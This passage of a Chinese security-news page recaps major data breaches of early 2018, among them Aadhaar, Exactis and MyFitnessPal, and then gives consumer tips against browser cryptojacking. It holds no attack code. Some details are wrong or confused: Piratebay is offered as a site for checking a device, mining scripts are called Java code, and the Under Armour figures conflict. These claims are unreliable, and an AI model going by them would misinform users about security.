一名安全研究员于6月4日联系了在线家谱平台MyHeritage的首席信息安全官,并透露他们在公司外的私人服务器上找到了一个标有“myheritage”的文件。在检查文件后,MyHeritage的官员确认该资产包含了在2017年10月26日之前已注册MyHeritage的所有用户的电子邮箱地址。该公司发布的一份声明称,由于MyHeritage依赖第三方服务提供商来处理会员的付款,因此它也包含了他们的哈希密码,但不包含支付信息。由于该服务将家谱和DNA数据存储在与存储电子邮箱地址的服务器不同的服务器上,因此MyHeritage表示没有理由相信这些信息已经被暴露或受到损坏。

3)Under Armour

2018上半年规模最大的十起数据泄露事件

  • 泄露数据5亿条
  • 披露日期:2018年5月25日

3月25日,Under Armour获悉有人未经授权访问了MyFitnessPal平台,这是一个用于跟踪用户饮食和锻炼情况的平台。美国全国广播公司财经频道(CNBC)在当时报道说,负责此次黑客入侵的犯罪分子访问了用户的用户名、电子邮件地址和哈希密码。但没有暴露用户的付款信息,因为Under Armour对这些数据进行了分别处理。同时,它也没有损害社会安全号码或驾驶执照号码,因为服装制造商表示它并不会收集此类数据。

据信,超过1.5亿MyFitnessPal用户的信息在数据泄露中受到了损害。

2)Exactis

2018上半年规模最大的十起数据泄露事件

  • 泄露数据超过4亿条
  • 披露日期:2018年6月26日

安全研究员Vinny Troia在2018年6月发现,总部位于佛罗里达州的市场营销和数据聚合公司Exactis已将一个数据库暴露在可公开访问的服务器上。该数据库包含2TB的信息,其中包括数亿美国人和企业的详细信息。在撰写本文时,Exactis尚未确认受此事件影响的确切人数,但Troia表示他能够找到近3.4亿条个人记录。他还向Wired证实,此事件暴露了消费者的电子邮箱地址、实际地址、电话号码以及一系列的其他个人信息,在某些情况下包括极其敏感的细节,如孩子的姓名和性别。

1)Aadhaar

2018上半年规模最大的十起数据泄露事件

  • 泄露数据11亿条
  • 披露日期:2018年1月3日

今年1月份,论坛报业集团(Tribune News Service)的记者为WhatsApp上匿名卖家提供的一项出售登录凭证的服务支付了500卢比。通过这项服务,记者可以输入任何一个Aadhaar号码(一个12位的唯一标识符,每个印度公民会使用到它)检索印度唯一身份识别管理局(UIDAI)存储的关于被查询公民的诸多类型的信息。这些数据包括姓名、住址、照片、电话号码和电子邮箱地址。在向卖家额外支付300卢比的费用后,任何人都可以通过该软件打印某个Aadhaar号码归属者的身份证。

据信,这起数据泄露事件已经损害了在印度注册的11亿公民的个人信息。

其他值得注意的数据泄露事件

Strava

2017年11月,健身追踪应用程序Strava有意发布了一份包含1300万用户活动轨迹的“热图”。这张地图让我们了解了世界各地的人们是如何利用Strava来实现他们的健身目标的。但正如Bleeping Computer在1月底报道的那样,它也起到了意想不到的作用。联合冲突分析研究所(Institute for United Conflict analyst)的分析师Nathan Ruser于2018年1月发现,该地图显示了军事基地的位置。这是通过在已知军事设施所在的偏远地区展示人们的身体活动来发现的,其中包括美军基地以及土耳其和俄罗斯基地。

Health South East RHF

今年年初,挪威卫生安全部门HelseCERT检测到了异常的计算机活动。它最终将这种可疑行为追溯到了作为挪威四大区域医疗保健组织之一的Health South East RHF。根据Security Affairs的报道,HelseCERT发现这起攻击是由一群“专业的”和“高端的”攻击者发起的。

在HelseCERT披露此事件后,挪威卫生与护理部澄清说,该国采取了各种安全措施来解决这一问题。

受攻击影响的人数确切人数尚不清楚。但考虑到Health South East RHF的覆盖范围,可能有290万人(超过挪威总人口的一半)成为了事件的受害者。

[24]7.ai

4月4日,西尔斯控股公司(Sears Holding Corporation)和达美航空公司(Delta Airlines)都公布了属于数十万客户数据遭泄露的消息。这些数据是通过[24]7.ai的数据泄露而暴露出来的,这是一种提供在线聊天支持的第三方服务。

根据达美航空的声明,这起黑客入侵事件被认为发生在2017年9月26日至2017年10月12日期间,可能泄露了信用卡信息,但受影响的客户数量不详。该航空公司强调,没有其他信息(如护照、身份证或SkyMiles信息)受到影响。西尔斯估计,可能有少于10万名客户的信用卡信息在此次黑客入侵中被曝光。 一天后,零售商百思买(Best Buy)宣布,其一小部分客户可能也受到了此次事件的影响。

Orbitz

3月1日,Orbitz  发现 有人未经授权访问了它的一个遗留的旅行预订平台。这家在线旅行社认为,攻击者有能力查看某些敏感信息,包括客户姓名、出生日期、电话号码、电子邮箱地址、帐单地址、性别和支付卡信息。但没有证据表明这一事件暴露了客户的护照、旅行路线或社会安全号码。

根据彭博(Bloomberg)报道,黑客可能在2017年10月1日至2017年12月22日期间访问了88万名客户的支付卡详细信息。

令人不安的上半年

根据身份盗窃资源中心(ITRC)的2017年数据泄露总结报告,在2018年第一季度和第二季度遭泄露数据的数量已经超过了2017年全年遭泄露数据数量的总和。值得注意的是,本文所提供的数据泄露事件列表远远谈不上全面。在2018年上半年发生了许多其他的数据泄露事件,这意味着遭泄露数据的数量实际上要多得多。不过,也只有时间才能够证明这是否属实。

 

本文由 黑客视界 综合网络整理,图片源自网络;转载请注明“转自黑客视界”,并附上链接。

如何阻止黑客偷偷用你的电脑和手机挖矿?

随着加密货币价格的疯狂上涨,各路人马纷纷投身这场“挖矿”大战中,俨然形成了一场新的淘金热。

利用电脑和智能手机来挖矿,这个过程又称作“偷矿”,黑客会在你毫不知情的情况下利用你的处理器并消耗很多额外电量。事实上,目前这种黑客技术已经入围了恶意软件的 Top 10榜单。

对于这样的情况,我们应当如何采取应对之策呢?请别担心,通过阅读本文你能够学会保护自己的方法。

什么是“偷矿”?

“偷矿”是指未经你同意的情况下,黑客利用你的系统资源挖掘虚拟货币。这主要借助于网站的 Java 代码,黑客在代码中注入“偷矿”程序,当你访问这些代码时,“偷矿”程序便会偷偷自动运行。

虽然黑客能够主动入侵网站来运行挖矿脚本,但需要注意的是,那些使用了类似 Coinhive.com 这种插件服务的网站无意中也会给黑客提供更多的可乘之机。

简而言之,你访问的网站都有可能利用你的设备来“偷矿”。

检测“偷矿”

如果你发现自己的智能手机或者笔记本电脑突然发烫或者 CPU 使用率极高,但是你并未运行太多的应用程序,那么你的设备很可能被黑客“劫持”了,他们正在利用你的设备“偷矿”。

你可以使用设备访问检测网站(例如 Piratebay)来确认其安全性。

预防“偷矿”

不管你的设备是否被黑客利用了,未雨绸缪总是没错的。以下建议可以助你防患于未然:

1. 使用 Opera 浏览器

虽然 Chrome 是最常用的浏览器,但是 Opera 浏览器提供了一些 Chrome 没有的有趣功能。最新版本的 Opera 浏览器能够自动拦截广告,此外,它还内置了阻止挖矿的防护功能。这一功能可以阻止网站擅自运行非法挖矿的脚本,这与网页上的广告拦截技术并没有太大区别。

要启用此功能,只需配置“设置 > 基本设置 > 屏蔽广告”并检查 NoCoin 选项即可。如果你使用的是 MacOS 系统,可以在“系统偏好”中找到该选项。

除此之外,Opera 还为加密货币爱好者提供了其他一些有趣的选项。比如,它附带的货币转换器可以把普通货币价格转换为比特币等虚拟货币。

2. 不切换浏览器怎么办?

如果你不想切换默认浏览器,那么对于 Chrome 用户来说,你可以下载一个名为 No Coin 的扩展程序。而对于 Firefox 用户来说,你可以使用 NoMiner 这个扩展程序。和 Opera 浏览器内置的功能一样,这些扩展程序同样可以监控基于浏览器的挖矿脚本,一旦发现,它们就会立刻阻止这些挖矿脚本。

3. 保护手机

如前文所述,黑客可以通过非法入侵智能手机来进行“偷矿”。幸运的是,Opera 同样可以保护我们的手机。Opera 和 Opera Mini 也可以通过拦截广告的方式阻止“偷矿”程序在安卓设备上的运行。

与电脑相比,这些恶意脚本对我们手机的伤害可能会更大。如果手机访问的这些网站是开放的,这些脚本就可以在手机后台一直“偷矿”,严重影响手机电池的使用寿命以及 CPU 和 GPU 的使用率,导致手机发热和变卡。

同样的,你可以在手机的设置选项中开启拦截器,并在智能手机上使用 Firefox 的 No Miner 来免费浏览网页。

假如你使用的是 iPhone 和 Safari 浏览器,你也可以使用 1blocker.com 来阻止恶意的挖矿脚本。

4. 使用清理程序

如果采用了上面的措施之后你仍然放心不下,那么可以在电脑和智能手机上安装 Malwarebytes 清理程序,它的电脑版是完全免费的,但是针对手机的高级版是收费的。随着现在越来越多的区块链项目开始采用手机挖矿,如果你不想让自己的手机有被当作肉鸡的风险,适当花点小钱也是值得的。

你仍然可以继续使用像卡巴斯基这样的防病毒软件来保护自己的智能手机。

写在最后

最后,必须要说明的是,通过网站挖矿并不一定是坏事,但是如果用户自己不知情,那就可能存在恶意的企图。

如果你喜欢某个网站,可以把它添加到自己的白名单中,这样一来,你每次在电脑或者手机端访问这个网站的时候,它就可以自动挖矿。